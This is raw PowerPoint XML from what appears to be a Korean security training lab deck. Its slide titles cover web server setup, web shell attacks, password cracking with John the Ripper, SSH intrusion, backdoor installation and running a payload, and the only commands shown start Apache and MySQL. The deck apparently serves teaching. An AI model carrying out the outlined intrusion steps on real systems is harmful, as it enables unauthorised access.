                <a:schemeClr val="bg1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endParaRPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="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	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="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	# service apache2 start</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="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	# service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1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mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="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 start</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1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EAB54A5C-507D-4ECE-A115-89C819D2D333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1704323"/>
            <a:ext cx="6004619" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="204E5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0452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1F221A1-287D-4574-88F0-4B1757AE783B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254004" y="673100"/>
            <a:ext cx="6349993" cy="8966196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rgbClr val="204E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DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="사각형: 둥근 위쪽 모서리 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AACD4C7F-A2E5-4CE5-8F66-A76480D2D61C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3314700" y="165100"/>
            <a:ext cx="3162300" cy="508000"/>
          </a:xfrm>
          <a:prstGeom prst="round2SameRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="204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B3443ADE-1D9D-4A28-A056-276AC21D4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927100"/>
            <a:ext cx="5913238" cy="698500"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> 동작 확인</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="텍스트 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E9B8CE0-892E-4EDC-A835-56924FCBC521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3417541" y="215902"/>
            <a:ext cx="2956618" cy="406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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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Web Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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세팅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95020AD9-93A3-4AD0-895A-EB325D61FD3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426691" y="1704323"/>
            <a:ext cx="6004619" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="204E5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027699F5-6122-4A2D-AD22-9A1FE22BDD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468" y="1783047"/>
            <a:ext cx="5383063" cy="7765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9061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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12A34401-599B-45B7-85F2-254DBEDFA9A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254004" y="241297"/>
            <a:ext cx="6349993" cy="9397999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="20000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="204E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X국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:ea typeface="DX국민시대" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="사각형: 둥근 위쪽 모서리 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1898EFCF-EF1C-40AB-BA71-A382CFBBA3B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="2724152" y="-57143"/>
            <a:ext cx="2298698" cy="5460990"/>
          </a:xfrm>
          <a:prstGeom prst="round2SameRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="204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7" name="제목 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F4B6E55-904B-464D-918A-13440A5DEE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3531" y="1996900"/>
            <a:ext cx="4933945" cy="1352903"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1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WebShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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공격</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="부제목 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F900AFB5-8FB4-429A-A1A5-D8BC883ECC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79568" y="4009144"/>
            <a:ext cx="4841870" cy="842224"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/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34603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1327</TotalTime>
  <Words>1385</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>A4 용지(210x297mm)</PresentationFormat>
  <Paragraphs>259</Paragraphs>
  <Slides>41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41</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="49" baseType="lpstr">
      <vt:lpstr>DX국민시대</vt:lpstr>
      <vt:lpstr>나눔스퀘어_ac Bold</vt:lpstr>
      <vt:lpstr>맑은 고딕</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Office 테마</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>GNS3 세팅</vt:lpstr>
      <vt:lpstr>GNS3 개인</vt:lpstr>
      <vt:lpstr>GNS3 개인</vt:lpstr>
      <vt:lpstr>GNS3 조별</vt:lpstr>
      <vt:lpstr>Web Server 세팅</vt:lpstr>
      <vt:lpstr>Service Start</vt:lpstr>
      <vt:lpstr>Web 동작 확인</vt:lpstr>
      <vt:lpstr>WebShell 공격</vt:lpstr>
      <vt:lpstr>WebShell 실습 환경</vt:lpstr>
      <vt:lpstr>WebShell 공격 : 방법 1번</vt:lpstr>
      <vt:lpstr>WebShell 공격 : 방법 1번</vt:lpstr>
      <vt:lpstr>WebShell 공격 : 방법 1번</vt:lpstr>
      <vt:lpstr>WebShell 공격 : 방법 1번</vt:lpstr>
      <vt:lpstr>WebShell 공격 : 방법 1번</vt:lpstr>
      <vt:lpstr>WebShell 공격 : 방법 1번</vt:lpstr>
      <vt:lpstr>WebShell 공격 : 방법 1번</vt:lpstr>
      <vt:lpstr>WebShell 공격 : 방법 2번</vt:lpstr>
      <vt:lpstr>WebShell 공격 : 방법 2번</vt:lpstr>
      <vt:lpstr>WebShell 공격 : 방법 2번</vt:lpstr>
      <vt:lpstr>Password Cracking</vt:lpstr>
      <vt:lpstr>Johnny &amp; John the Ripper</vt:lpstr>
      <vt:lpstr>Johnny &amp; John the Ripper</vt:lpstr>
      <vt:lpstr>Johnny &amp; John the Ripper</vt:lpstr>
      <vt:lpstr>Johnny &amp; John the Ripper</vt:lpstr>
      <vt:lpstr>Johnny &amp; John the Ripper</vt:lpstr>
      <vt:lpstr>Johnny &amp; John the Ripper</vt:lpstr>
      <vt:lpstr>Johnny &amp; John the Ripper</vt:lpstr>
      <vt:lpstr>Johnny &amp; John the Ripper</vt:lpstr>
      <vt:lpstr>Johnny &amp; John the Ripper</vt:lpstr>
      <vt:lpstr>Johnny &amp; John the Ripper</vt:lpstr>
      <vt:lpstr>Johnny &amp; John the Ripper</vt:lpstr>
      <vt:lpstr>Johnny &amp; John the Ripper</vt:lpstr>
      <vt:lpstr>Johnny &amp; John the Ripper</vt:lpstr>
      <vt:lpstr>Johnny &amp; John the Ripper</vt:lpstr>
      <vt:lpstr>마무리</vt:lpstr>
      <vt:lpstr>ssh 침투 준비</vt:lpstr>
      <vt:lpstr>1. ssh 침투</vt:lpstr>
      <vt:lpstr>2. Backdoor 설치</vt:lpstr>
      <vt:lpstr>2. Backdoor 설치</vt:lpstr>
      <vt:lpstr>3. Payload 구동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ehee0</dc:creator>
  <cp:lastModifiedBy>KITRI</cp:lastModifiedBy>
  <cp:revision>62</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-10-07T11:57:36Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-20T07:29:07Z</dcterms:modified>
</cp:coreProperties>
</file>